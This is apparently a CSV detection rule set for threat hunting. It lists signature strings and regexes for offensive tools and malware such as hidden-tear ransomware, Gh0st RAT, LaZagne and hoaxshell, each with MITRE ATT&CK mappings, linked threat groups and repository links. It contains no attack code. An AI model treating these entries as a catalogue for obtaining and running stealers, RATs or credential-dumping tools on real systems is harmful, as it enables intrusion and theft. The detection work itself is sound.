"*""DLL's are awesome ! Especially Exec in Rust""*",".{0,1000}\""DLL\'s\sare\sawesome\s!\sEspecially\sExec\sin\sRust\"".{0,1000}","offensive_tool_keyword","Rust-for-Malware-Development","malware development using Rust","T1055.001 - T1027 - T1204 - T1518 - T1056 - T1021 - T1587/001","TA0005 - TA0003 - TA0007 - TA0009 - TA0004 - TA0008 - TA0042","N/A","N/A","Exploitation tool","https://github.com/Whitecat18/Rust-for-Malware-Development","1","0","#content","N/A","8","10","2123","53","2025-04-22T18:09:57Z","2024-02-12T16:55:06Z","3833"
"*""Don't use this for evil, please""*",".{0,1000}\""Don\'t\suse\sthis\sfor\sevil,\splease\"".{0,1000}","offensive_tool_keyword","Invoke-Obfuscation","Invoke-Obfuscation is a PowerShell v2.0+ compatible PowerShell command and script obfuscator.","T1027 - T1059.001 - T1564.003","TA0005 - TA0002","N/A","Oilrig","Defense Evasion","https://github.com/danielbohannon/Invoke-Obfuscation","1","0","#content","N/A","10","10","3935","782","2023-08-10T23:49:06Z","2016-09-25T03:38:02Z","3834"
"*""dsdoskdosk837928hduijfh""*",".{0,1000}\""dsdoskdosk837928hduijfh\"".{0,1000}","offensive_tool_keyword","hidden-tear","open source ransomware - many variant in the wild","T1486 - T1059 - T1485 - T1489 - T1070 - T1488","TA0005 - TA0009 - TA0040 - TA0042","N/A","N/A","Ransomware","https://github.com/goliate/hidden-tear","1","0","#mutex","N/A","10","8","765","394","2020-07-08T22:34:01Z","2015-08-19T09:06:51Z","3835"
"*""Dump BH data""*",".{0,1000}\""Dump\sBH\sdata\"".{0,1000}","offensive_tool_keyword","SOAPHound","enumerate Active Directory environments via the Active Directory Web Services (ADWS)","T1018 - T1087.002 - T1649","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/FalconForceTeam/SOAPHound","1","0","#content","N/A","8","8","736","76","2024-02-03T08:52:49Z","2024-01-25T09:11:12Z","3836"
"*""Evilginx Mastery Course""*",".{0,1000}\""Evilginx\sMastery\sCourse\"".{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0001","N/A","BlackCat - COLDRIVER","Phishing","https://github.com/kgretzky/evilginx2","1","0","#content","N/A","10","10","12879","2234","2025-01-21T15:16:19Z","2018-07-10T09:59:52Z","3837"
"*""Generate reverse shell payloads.""*",".{0,1000}\""Generate\sreverse\sshell\spayloads\.\"".{0,1000}","offensive_tool_keyword","Rev-Shell","Basic script to generate reverse shell payloads","T1055.011 - T1021.005 - T1560.001","TA0002 - TA0005 - TA0042 - TA0011","N/A","N/A","C2","https://github.com/washingtonP1974/Rev-Shell","1","0","N/A","N/A","3","10","29","1","2024-03-20T13:58:21Z","2024-03-20T13:37:12Z","3838"
"*""Gh0st RAT Exception""*",".{0,1000}\""Gh0st\sRAT\sException\"".{0,1000}","offensive_tool_keyword","gh0st","Malware RAT with keylogger - dll injection - C2 - Remote control","T1204.002 - T1071.001 - T1027 - T1036.005 - T1055.001 - T1005 - T1056.001 - T1074.001 - T1105 - T1562.001 - T1543.003 - T1547.001 - T1571 - T1573.001 - T1106 - T1219","TA0002 - TA0003 - TA0004 - TA0008 - TA0009 - TA0010 - TA0011","GhostRAT","N/A","Malware","https://github.com/sin5678/gh0st","1","0","#content","N/A","10","6","508","274","2013-05-08T21:17:26Z","2012-10-05T06:25:36Z","3839"
"*""Granted user * DCSYNC rights!*",".{0,1000}\""Granted\suser\s.{0,1000}\sDCSYNC\srights!.{0,1000}","offensive_tool_keyword","PassTheCert","tool to authenticate to an LDAP/S server with a certificate through Schannel","T1557 - T1071 - T1021 - T1213 - T1649","TA0006 - TA0008 - TA0009","N/A","Black Basta","Lateral Movement","https://github.com/AlmondOffSec/PassTheCert","1","0","N/A","N/A","10","7","618","76","2024-07-08T22:37:30Z","2022-04-29T09:08:32Z","3841"
"*""GTUNNEL_HOST""*",".{0,1000}\""GTUNNEL_HOST\"".{0,1000}","offensive_tool_keyword","gTunnel","tunelling solution written in golang","T1573.002 - T1071 - T1090 - T1105 - T1020","TA0005 - TA0010 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/hotnops/gTunnel","1","0","#content","N/A","10","10","266","49","2023-05-17T05:24:58Z","2020-03-09T02:52:48Z","3842"
"*""GTUNNEL_PORT""*",".{0,1000}\""GTUNNEL_PORT\"".{0,1000}","offensive_tool_keyword","gTunnel","tunelling solution written in golang","T1573.002 - T1071 - T1090 - T1105 - T1020","TA0005 - TA0010 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/hotnops/gTunnel","1","0","#content","N/A","10","10","266","49","2023-05-17T05:24:58Z","2020-03-09T02:52:48Z","3843"
"*""HEHE YOU HAVE BEEN PWENED""*",".{0,1000}\""HEHE\sYOU\sHAVE\sBEEN\sPWENED\"".{0,1000}","offensive_tool_keyword","Powershell-Scripts-for-Hackers-and-Pentesters","","T1059.001 - T1119 - T1027 - T1016 - T1056.001","TA0002 - TA0009 - TA0005 - TA0007 - TA0010","N/A","N/A","Collection","https://github.com/Whitecat18/Powershell-Scripts-for-Hackers-and-Pentesters","1","0","N/A","N/A","10","5","415","49","2025-02-23T09:05:44Z","2023-02-27T14:27:32Z","3844"
"*""https://api.ipify.org/?format=text"", ""https://myexternalip.com/raw"", ""https://wtfismyip.com/text"", ""https://icanhazip.com/"", ""https://ip4.seeip.org""*",".{0,1000}\""https\:\/\/api\.ipify\.org\/\?format\=text\"",\s\""https\:\/\/myexternalip\.com\/raw\"",\s\""https\:\/\/wtfismyip\.com\/text\"",\s\""https\:\/\/icanhazip\.com\/\"",\s\""https\:\/\/ip4\.seeip\.org\"".{0,1000}","offensive_tool_keyword","fetch-some-proxies","Simple Python script for fetching ""some"" (usable) proxies","T1090 - T1071 - T1070","TA0002 - TA0005 - TA0010","N/A","N/A","Defense Evasion","https://github.com/stamparm/fetch-some-proxies","1","0","N/A","N/A","9","6","585","138","2023-03-15T09:14:25Z","2016-10-09T22:39:56Z","3846"
"*""iN""+""voK""+""e""+""-""+""eXP""+""re""+""sSi""+""oN""*",".{0,1000}\""iN\""\+\""voK\""\+\""e\""\+\""\-\""\+\""eXP\""\+\""re\""\+\""sSi\""\+\""oN\"".{0,1000}","offensive_tool_keyword","Invoke-Stealth","Simple & Powerful PowerShell Script Obfuscator","T1027.004","TA0005","N/A","N/A","Defense Evasion","https://github.com/JoelGMSec/Invoke-Stealth","1","0","N/A","N/A","9","6","559","81","2023-04-21T12:49:37Z","2021-04-13T10:22:05Z","3847"
"*""Injecting shellcode into PowerShell""*",".{0,1000}\""Injecting\sshellcode\sinto\sPowerShell\"".{0,1000}","offensive_tool_keyword","Python-Rootkit","full undetectable python RAT which can bypass almost all antivirus and open a backdoor inside any windows machine which will establish a reverse https Metasploit connection to your listening machine","T1100 - T1027 - T1219 - T1560.001 - T1021.005","TA0005 - TA0003 - TA0011","N/A","N/A","C2","https://github.com/0xIslamTaha/Python-Rootkit","1","0","N/A","N/A","10","10","606","145","2024-10-29T16:56:39Z","2016-06-09T10:49:54Z","3848"
"*""IPPrint C2 Server""*",".{0,1000}\""IPPrint\sC2\sServer\"".{0,1000}","offensive_tool_keyword","IPPrintC2","PoC for using MS Windows printers for persistence / command and control via Internet Printing","T1090 - T1133 - T1547.012 - T1572","TA0011 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/Diverto/IPPrintC2","1","0","N/A","N/A","10","10","146","20","2024-05-03T11:13:38Z","2024-05-03T09:13:10Z","3849"
"*""keylog.php""*",".{0,1000}\""keylog\.php\"".{0,1000}","offensive_tool_keyword","BlackShades","remote access trojan (RAT) used by attackers to gain unauthorized control over a victim's computer","T1012 - T1059.001 - T1071.001 - T1105 - T1113 - T1125","TA0003 - TA0005 - TA0008 - TA0010 - TA0011","N/A","N/A","Malware","https://github.com/yuankong666/Ultimate-RAT-Collection/tree/main/BlackShades","1","0","N/A","N/A","10","10","2468","431","2025-04-15T16:14:10Z","2023-09-12T00:41:11Z","3850"
"*""localadmin123!""*",".{0,1000}\""localadmin123!\"".{0,1000}","offensive_tool_keyword","LocalAdminSharp",".NET executable to use when dealing with privilege escalation on Windows to gain local administrator access","T1055.011 - T1068 - T1548.002 - T1548.003 - T1548.004","TA0004","N/A","N/A","Privilege Escalation","https://github.com/notdodo/LocalAdminSharp","1","0","N/A","N/A","10","2","157","17","2022-11-01T17:45:43Z","2022-01-01T10:35:09Z","3851"
"*""Malware resources needs to be free and wide""*",".{0,1000}\""Malware\sresources\sneeds\sto\sbe\sfree\sand\swide\"".{0,1000}","offensive_tool_keyword","Rust-for-Malware-Development","malware development using Rust","T1055.001 - T1027 - T1204 - T1518 - T1056 - T1021 - T1587/001","TA0005 - TA0003 - TA0007 - TA0009 - TA0004 - TA0008 - TA0042","N/A","N/A","Exploitation tool","https://github.com/Whitecat18/Rust-for-Malware-Development","1","0","#content","N/A","8","10","2123","53","2025-04-22T18:09:57Z","2024-02-12T16:55:06Z","3852"
"*""MSGraph token is CAE capable""*",".{0,1000}\""MSGraph\stoken\sis\sCAE\scapable\"".{0,1000}","offensive_tool_keyword","TokenTacticsV2","fork of the great TokenTactics with support for CAE and token endpoint v2","T1134.002 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/f-bader/TokenTacticsV2","1","0","N/A","N/A","6","3","282","38","2025-02-25T14:14:25Z","2022-08-16T17:00:45Z","3854"
"*""My moto is to leave malware resources for free *",".{0,1000}\""My\smoto\sis\sto\sleave\smalware\sresources\sfor\sfree\s.{0,1000}","offensive_tool_keyword","Rust-for-Malware-Development","malware development using Rust","T1055.001 - T1027 - T1204 - T1518 - T1056 - T1021 - T1587/001","TA0005 - TA0003 - TA0007 - TA0009 - TA0004 - TA0008 - TA0042","N/A","N/A","Exploitation tool","https://github.com/Whitecat18/Rust-for-Malware-Development","1","0","#content","N/A","8","10","2123","53","2025-04-22T18:09:57Z","2024-02-12T16:55:06Z","3855"
"*""N/A (Likely Pirated)""*",".{0,1000}\""N\/A\s\(Likely\sPirated\)\"".{0,1000}","offensive_tool_keyword","Fentanyl","Stealer Malware - Steal Discord Tokens (+ Much More Info) - Steal Passwords/Cookies/History/Credit Cards/Phone Numbers and Addresses from all Browsers (Profile Support) - Steal PC Info - Steal Video Game Accounts (Adding more games + wallets and VPN's) - Low Detections - Anti VM - Sort of Fast - Startup - IP Logger","T1547.001 - T1552.001 - T1552.005 - T1110.001 - T1082 - T1562.001 - T1574.002 - T1529 - T1497.001 - T1543.003 - T1592.001","TA0005 - TA0006 - TA0040 - TA0003 - TA0009","N/A","N/A","Malware","https://github.com/dekrypted/Fentanyl","1","0","N/A","N/A","10","","N/A","","","","3856"
"*""NSA0XF$""*",".{0,1000}\""NSA0XF\$\"".{0,1000}","offensive_tool_keyword","doucme","leverages the NetUserAdd Win32 API to create a new computer account","T1136 - T1098 - T1078","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Ben0xA/DoUCMe","1","0","N/A","N/A","9","1","69","18","2021-05-01T03:15:59Z","2021-04-29T15:41:28Z","3857"
"*""PAY ME MONEY""*",".{0,1000}\""PAY\sME\sMONEY\"".{0,1000}","offensive_tool_keyword","DoubleDrive","A fully-undetectable ransomware that utilizes OneDrive & Google Drive to encrypt target local files","T1486 - T1562.001 - T1213 - T1070.004 - T1070.006 - T1105","TA0040 - TA0009 - TA0011 - TA0005","N/A","N/A","Ransomware","https://github.com/SafeBreach-Labs/DoubleDrive","1","0","N/A","N/A","10","2","124","14","2024-05-28T16:25:59Z","2023-05-23T13:17:38Z","3859"
"*""RANSOM_NOTE.txt""*",".{0,1000}\""RANSOM_NOTE\.txt\"".{0,1000}","offensive_tool_keyword","DoubleDrive","A fully-undetectable ransomware that utilizes OneDrive & Google Drive to encrypt target local files","T1486 - T1562.001 - T1213 - T1070.004 - T1070.006 - T1105","TA0040 - TA0009 - TA0011 - TA0005","N/A","N/A","Ransomware","https://github.com/SafeBreach-Labs/DoubleDrive","1","0","N/A","N/A","10","2","124","14","2024-05-28T16:25:59Z","2023-05-23T13:17:38Z","3861"
"*""RdpStrike.cna""*",".{0,1000}\""RdpStrike\.cna\"".{0,1000}","offensive_tool_keyword","RdpStrike","Positional Independent Code to extract clear text password from mstsc.exe using API Hooking via HWBP","T1081 - T1055.011 - T1012 - T1113 - T1040 - T1185","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/0xEr3bus/RdpStrike","1","0","N/A","N/A","10","3","238","27","2024-06-11T19:40:05Z","2024-06-11T19:31:50Z","3862"
"*""sacrificialO365Passwords"": *",".{0,1000}\""sacrificialO365Passwords\""\:\s.{0,1000}","offensive_tool_keyword","TeamFiltration","TeamFiltration is a cross-platform framework for enumerating, spraying, exfiltrating, and backdooring O365 AAD accounts","T1110 - T1087 - T1560.001 - T1592 - T1071","TA0001 - TA0003 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Flangvik/TeamFiltration","1","0","N/A","N/A","10","10","1132","128","2025-04-10T13:48:00Z","2022-06-28T00:00:28Z","3864"
"*""sacrificialO365Username"": *",".{0,1000}\""sacrificialO365Username\""\:\s.{0,1000}","offensive_tool_keyword","TeamFiltration","TeamFiltration is a cross-platform framework for enumerating, spraying, exfiltrating, and backdooring O365 AAD accounts","T1110 - T1087 - T1560.001 - T1592 - T1071","TA0001 - TA0003 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Flangvik/TeamFiltration","1","0","N/A","N/A","10","10","1132","128","2025-04-10T13:48:00Z","2022-06-28T00:00:28Z","3865"
"*""samaccounttype=268435456)(samaccounttype=268435457)(samaccounttype=536870912)(samaccounttype=536870913)*",".{0,1000}\""samaccounttype\=268435456\)\(samaccounttype\=268435457\)\(samaccounttype\=536870912\)\(samaccounttype\=536870913\).{0,1000}","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1087.001 - T1087.002 - T1482 - T1016 - T1018 - T1046","TA0007 - TA0043 - TA0005 - TA0042","Dispossessor - Trickbot - Dridex - Locky - Uyghur - BlackCat - ALPHV - Defray777 - RansomExx","APT20 - TA505 - APT29 - GOLD DUPONT - Scattered Spider - UNC3944 - TA2101 - Wizard Spider - Grim Spider - Lunar Spider - Dispossessor","Discovery","https://thedfirreport.com/2024/08/26/blacksuit-ransomware/","1","0","N/A","N/A","N/A","7","N/A","N/A","N/A","N/A","3866"
"*""Saved in session, but master password prevents plaintext recovery""*",".{0,1000}\""Saved\sin\ssession,\sbut\smaster\spassword\sprevents\splaintext\srecovery\"".{0,1000}","offensive_tool_keyword","SessionGopher","uses WMI to extract saved session information for remote access tools such as WinSCP - PuTTY - SuperPuTTY - FileZilla and Microsoft Remote Desktop. It can be run remotely or locally.","T1047 - T1003.008 - T1552.004 - T1555.003","TA0006","N/A","PYSA - DarkSide - Sphinx","Credential Access","https://github.com/Arvanaghi/SessionGopher","1","0","#content","N/A","10","10","1255","173","2022-11-22T21:33:23Z","2017-03-08T02:49:32Z","3867"
"*""ServiceName = """"unstoppable""*",".{0,1000}\""ServiceName\s\=\s\""unstoppable\"".{0,1000}","offensive_tool_keyword","UnstoppableService","a Windows service in C# that is self installing as a single executable and sets proper attributes to prevent an administrator from stopping or pausing the service through the Windows Service Control Manager interface","T1543.003 - T1564.001 - T1490","TA0003 - TA0005","N/A","N/A","Persistence","https://github.com/malcomvetter/UnstoppableService","1","0","#servicename","N/A","5","1","66","15","2019-01-19T22:38:18Z","2018-08-07T22:11:22Z","3868"
"*""ServiceName=""""bypassit""*",".{0,1000}\""ServiceName\=\""bypassit\"".{0,1000}","offensive_tool_keyword","AutoPwnKey","red teaming framework and testing tool using AutoHotKey","T1059.007 - T1204.002 - T1564.004 - T1105 - T1087 - T1069 - T1027 - T1218 - T1548.002 - T1547 - T1056.001 - T1021.001 - T1102 - T1573 - T1499 - T1565","TA0001 - TA0007 - TA0005 - TA0004 - TA0003 - TA0006 - TA0008 - TA0011 - TA0040","N/A","N/A","Exploitation tool","https://github.com/CroodSolutions/AutoPwnKey","1","0","#content","N/A","10","1","25","5","2025-04-11T21:52:48Z","2024-08-14T05:05:33Z","3869"
"*""small web shell by zaco*",".{0,1000}\""small\sweb\sshell\sby\szaco.{0,1000}","offensive_tool_keyword","OWASP rules","OWASP repo of rules - extracted strings for detection","T1100 - T1505.003 - T1059.001","TA0003","N/A","N/A","Persistence","https://github.com/coreruleset/coreruleset/","1","0","N/A","php title webshell","7","10","2536","403","2025-04-22T10:55:49Z","2020-05-13T11:28:52Z","3871"
"*""Stardust MessageBox""*",".{0,1000}\""Stardust\sMessageBox\"".{0,1000}","offensive_tool_keyword","Stardust","An modern 64-bit position independent implant template","T1055 - T1105 - T1055.012 - T1027 - T1218","TA0005 - TA0003 - TA0004","N/A","N/A","Defense Evasion","https://github.com/Cracked5pider/Stardust","1","0","N/A","N/A","10","10","1193","193","2025-03-21T11:41:09Z","2022-02-20T01:23:35Z","3872"
"*""Starting Elevating to SYSTEM""*",".{0,1000}\""Starting\sElevating\sto\sSYSTEM\"".{0,1000}","offensive_tool_keyword","WDBypass","Disable Windows Defender (+ UAC Bypass, + Upgrade to SYSTEM)","T1089 - T1562.001 - T1548.002","TA0005 - TA0040 - TA0003 - TA0004","N/A","Dispossessor","Defense Evasion","https://bitbucket.org/evilgreyswork/wd-uac/downloads/","1","0","N/A","https://blog.injectexp.dev/2024/02/28/disable-windows-defender-uac-bypass-upgrade-to-system/","10","10","N/A","N/A","N/A","N/A","3873"
"*""Starting WD Disable""*",".{0,1000}\""Starting\sWD\sDisable\"".{0,1000}","offensive_tool_keyword","WDBypass","Disable Windows Defender (+ UAC Bypass, + Upgrade to SYSTEM)","T1089 - T1562.001 - T1548.002","TA0005 - TA0040 - TA0003 - TA0004","N/A","Dispossessor","Defense Evasion","https://bitbucket.org/evilgreyswork/wd-uac/downloads/","1","0","N/A","https://blog.injectexp.dev/2024/02/28/disable-windows-defender-uac-bypass-upgrade-to-system/","10","10","N/A","N/A","N/A","N/A","3874"
"*""Successful Connection PME""*",".{0,1000}\""Successful\sConnection\sPME\"".{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003 - T1621","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","Exploitation tool","https://github.com/The-Viper-One/PsMapExec","1","0","N/A","N/A","10","10","954","108","2025-03-11T14:38:50Z","2023-06-20T16:57:27Z","3875"
"*""The LaZagne project""*",".{0,1000}\""The\sLaZagne\sproject\"".{0,1000}","offensive_tool_keyword","LaZagne","The LaZagne project is an open source application used to retrieve lots of passwords stored on a local computer. Each software stores its passwords using different techniques (plaintext   APIs   custom algorithms   databases   etc.). This tool has been developed for the purpose of finding these passwords for the most commonly-used software.","T1555 - T1555.001 - T1555.003 - T1555.004 - T1003.001 - T1003.004 - T1003.005 - T1003.007 - T1003.008 - T1552.001","TA0006 - TA0009","N/A","Akira - AvosLocker - LockBit - GoGoogle - 8BASE - RansomEXX - Leafminer - Wizard Spider - APT3 - Scattered Spider - OilRig - MuddyWater - Inception - APT33 - TeamTNT - Tonto Team - Evilnum - CHRYSENE - GOLD DUPONT","Credential Access","https://github.com/AlessandroZ/LaZagne","1","0","#content","N/A","10","10","9941","2062","2025-04-10T14:24:35Z","2015-02-16T14:10:02Z","3876"
"*""This is a macro obfuscating framework""*",".{0,1000}\""This\sis\sa\smacro\sobfuscating\sframework\"".{0,1000}","offensive_tool_keyword","spinningteacup","identify different parts of a vba script and perform substitutions","T1027","TA0005","N/A","N/A","Defense Evasion","https://github.com/trustedsec/The_Shelf","1","0","N/A","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","3877"
"*""UACBypassedService""*",".{0,1000}\""UACBypassedService\"".{0,1000}","offensive_tool_keyword","S4UTomato","Escalate Service Account To LocalSystem via Kerberos","T1558 - T1558.002 - T1548.002 - T1078 - T1078.004","TA0006 - TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/wh0amitz/S4UTomato","1","0","N/A","N/A","10","4","394","76","2023-09-14T08:53:19Z","2023-07-30T11:51:57Z","3878"
"*""User32LogonProcesss""*",".{0,1000}User32LogonProcesss.{0,1000}","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1482 - T1558.001 - T1558.002 - T1558.003 - T1558.004","TA0006","N/A","Black Basta - Dispossessor - Conti - Diavol - Ryuk - Wizard Spider - APT29 - COZY BEAR","Credential Access","https://x.com/_RastaMouse/status/1747636529613197757","1","0","N/A","typo in the process name used when calling LsaRegisterLogonProcess","10","10","N/A","N/A","N/A","N/A","3879"
"*""VeeamBackupCreds""*",".{0,1000}\""VeeamBackupCreds\"".{0,1000}","offensive_tool_keyword","SharpVeeamDecryptor","Decrypt Veeam database passwords","T1555.005 - T1003 - T1059","TA0006 - TA0005 - TA0008","N/A","N/A","Credential Access","https://github.com/S3cur3Th1sSh1t/SharpVeeamDecryptor","1","0","N/A","used by EMBARGO Ransomware","10","2","158","18","2023-11-07T14:00:47Z","2023-11-07T14:00:45Z","3881"
"*""WorkstationName"">RULER</Data>*",".{0,1000}\""WorkstationName\""\>RULER\<\/Data\>.{0,1000}","offensive_tool_keyword","ruler","A tool to abuse Exchange services","T1087 - T1110 - T1133 - T1064 - T1204","TA0007 - TA0006 - TA0003 - TA0002 - TA0005","N/A","APT33","Persistence","https://github.com/sensepost/ruler","1","0","N/A","N/A","10","10","2222","362","2024-06-10T11:03:07Z","2016-08-18T15:05:13Z","3882"
"*#  @oldboy21*",".{0,1000}\#\s\s\@oldboy21.{0,1000}","offensive_tool_keyword","smbsr","Lookup for interesting stuff in SMB shares","T1135","TA0001 - TA0007","N/A","N/A","Discovery","https://github.com/oldboy21/SMBSR","1","0","N/A","N/A","7","2","149","23","2023-06-16T14:35:30Z","2021-11-10T16:55:52Z","3883"
"*# Add random newlines to the obfuscated code*",".{0,1000}\#\sAdd\srandom\snewlines\sto\sthe\sobfuscated\scode.{0,1000}","offensive_tool_keyword","ASPJinjaObfuscator","Heavily obfuscated ASP web shell generation tool.","T1100 - T1027","TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/fin3ss3g0d/ASPJinjaObfuscator","1","0","N/A","N/A","8","2","160","21","2024-04-26T01:27:42Z","2024-04-23T01:01:53Z","3884"
"*# Author: Dahvid Schloss a.k.a APT Big Daddy*",".{0,1000}\#\sAuthor\:\sDahvid\sSchloss\sa\.k\.a\sAPT\sBig\sDaddy.{0,1000}","offensive_tool_keyword","PILOT","Pilot is a simplified system designed for the stealthy transfer of files across networks using ICMP","T1048.001 - T1573.001 - T1020","TA0010 - TA0002 - TA0009","N/A","N/A","Data Exfiltration","https://github.com/dahvidschloss/PILOT","1","0","N/A","N/A","9","1","79","7","2024-04-16T18:24:44Z","2024-04-03T15:04:33Z","3886"
"*# Author: Panagiotis Chartas (t3l3machus)*",".{0,1000}\#\sAuthor\:\sPanagiotis\sChartas\s\(t3l3machus\).{0,1000}","offensive_tool_keyword","hoaxshell","An unconventional Windows reverse shell. currently undetected by Microsoft Defender and various other AV solutions. solely based on http(s) traffic","T1059 - T1071 - T1071.001 - T1203","TA0002 - TA0011","N/A","N/A","C2","https://github.com/t3l3machus/hoaxshell","1","0","N/A","N/A","N/A","10","3212","499","2025-01-19T12:29:35Z","2022-07-10T15:36:24Z","3887"
"*# based on CVE-2019-0708*",".{0,1000}\#\sbased\son\sCVE\-2019\-0708.{0,1000}","offensive_tool_keyword","EternalBlack","EternalRomance exploit implemented by Playbit EternalBlack often used by ransomware group like Dispossessor","T1210 - T1489 - T1105 - T1486","TA0001 - TA0002 - TA0009 - TA0040","EternalBlack","Dispossessor ","Exploitation tool","https://research.checkpoint.com/2020/graphology-of-an-exploit-playbit/","1","0","#content","N/A","10","10","N/A","N/A","N/A","N/A","3888"
"*# coded by PlayBit (c) *",".{0,1000}\#\scoded\sby\sPlayBit\s\(c\)\s.{0,1000}","offensive_tool_keyword","EternalBlack","EternalRomance exploit implemented by Playbit EternalBlack often used by ransomware group like Dispossessor","T1210 - T1489 - T1105 - T1486","TA0001 - TA0002 - TA0009 - TA0040","EternalBlack","Dispossessor ","Exploitation tool","https://research.checkpoint.com/2020/graphology-of-an-exploit-playbit/","1","0","#content","N/A","10","10","N/A","N/A","N/A","N/A","3889"
"*# download virRu5*",".{0,1000}\#\sdownload\svirRu5.{0,1000}","offensive_tool_keyword","Python-Rootkit","full undetectable python RAT which can bypass almost all antivirus and open a backdoor inside any windows machine which will establish a reverse https Metasploit connection to your listening machine","T1100 - T1027 - T1219 - T1560.001 - T1021.005","TA0005 - TA0003 - TA0011","N/A","N/A","C2","https://github.com/0xIslamTaha/Python-Rootkit","1","0","N/A","N/A","10","10","606","145","2024-10-29T16:56:39Z","2016-06-09T10:49:54Z","3890"
"*# execute virRu5*",".{0,1000}\#\sexecute\svirRu5.{0,1000}","offensive_tool_keyword","Python-Rootkit","full undetectable python RAT which can bypass almost all antivirus and open a backdoor inside any windows machine which will establish a reverse https Metasploit connection to your listening machine","T1100 - T1027 - T1219 - T1560.001 - T1021.005","TA0005 - TA0003 - TA0011","N/A","N/A","C2","https://github.com/0xIslamTaha/Python-Rootkit","1","0","N/A","N/A","10","10","606","145","2024-10-29T16:56:39Z","2016-06-09T10:49:54Z","3891"
"*# Find LOLBin and reconstruct commandline*",".{0,1000}\#\sFind\sLOLBin\sand\sreconstruct\scommandline.{0,1000}","offensive_tool_keyword","LOLSpoof","An interactive shell to spoof some LOLBins command line","T1036.005","TA0005","N/A","N/A","Defense Evasion","https://github.com/itaymigdal/LOLSpoof","1","0","#content","N/A","8","2","184","24","2024-01-27T05:43:59Z","2024-01-16T20:15:38Z","3892"
"*# Force Admin: Bypass Admin Privileges?*",".{0,1000}\#\sForce\sAdmin\:\sBypass\sAdmin\sPrivileges\?.{0,1000}","offensive_tool_keyword","Fentanyl","Stealer Malware - Steal Discord Tokens (+ Much More Info) - Steal Passwords/Cookies/History/Credit Cards/Phone Numbers and Addresses from all Browsers (Profile Support) - Steal PC Info - Steal Video Game Accounts (Adding more games + wallets and VPN's) - Low Detections - Anti VM - Sort of Fast - Startup - IP Logger","T1547.001 - T1552.001 - T1552.005 - T1110.001 - T1082 - T1562.001 - T1574.002 - T1529 - T1497.001 - T1543.003 - T1592.001","TA0005 - TA0006 - TA0040 - TA0003 - TA0009","N/A","N/A","Malware","https://github.com/dekrypted/Fentanyl","1","0","N/A","N/A","10","","N/A","","","","3893"
"*# If got a malicious packet - Activate the backdoor!*",".{0,1000}\#\sIf\sgot\sa\smalicious\spacket\s\-\sActivate\sthe\sbackdoor!.{0,1000}","offensive_tool_keyword","Sandman","Sandman is a NTP based backdoor for red team engagements in hardened networks.","T1105 - T1027 - T1071.001","TA0011 - TA0005","N/A","N/A","Persistence","https://github.com/Idov31/Sandman","1","0","N/A","N/A","10","8","785","108","2024-03-31T17:40:15Z","2022-08-21T11:04:45Z","3894"
"*# Inject: Inject payload into Discord?*",".{0,1000}\#\sInject\:\sInject\spayload\sinto\sDiscord\?.{0,1000}","offensive_tool_keyword","Fentanyl","Stealer Malware - Steal Discord Tokens (+ Much More Info) - Steal Passwords/Cookies/History/Credit Cards/Phone Numbers and Addresses from all Browsers (Profile Support) - Steal PC Info - Steal Video Game Accounts (Adding more games + wallets and VPN's) - Low Detections - Anti VM - Sort of Fast - Startup - IP Logger","T1547.001 - T1552.001 - T1552.005 - T1110.001 - T1082 - T1562.001 - T1574.002 - T1529 - T1497.001 - T1543.003 - T1592.001","TA0005 - TA0006 - TA0040 - TA0003 - TA0009","N/A","N/A","Malware","https://github.com/dekrypted/Fentanyl","1","0","N/A","N/A","10","","N/A","","","","3895"
"*# Injection URL: Raw URL to injection payload*",".{0,1000}\#\sInjection\sURL\:\sRaw\sURL\sto\sinjection\spayload.{0,1000}","offensive_tool_keyword","Fentanyl","Stealer Malware - Steal Discord Tokens (+ Much More Info) - Steal Passwords/Cookies/History/Credit Cards/Phone Numbers and Addresses from all Browsers (Profile Support) - Steal PC Info - Steal Video Game Accounts (Adding more games + wallets and VPN's) - Low Detections - Anti VM - Sort of Fast - Startup - IP Logger","T1547.001 - T1552.001 - T1552.005 - T1110.001 - T1082 - T1562.001 - T1574.002 - T1529 - T1497.001 - T1543.003 - T1592.001","TA0005 - TA0006 - TA0040 - TA0003 - TA0009","N/A","N/A","Malware","https://github.com/dekrypted/Fentanyl","1","0","N/A","N/A","10","","N/A","","","","3896"
"*# Majdi SaaD.exe*",".{0,1000}\#\sMajdi\sSaaD\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","3897"
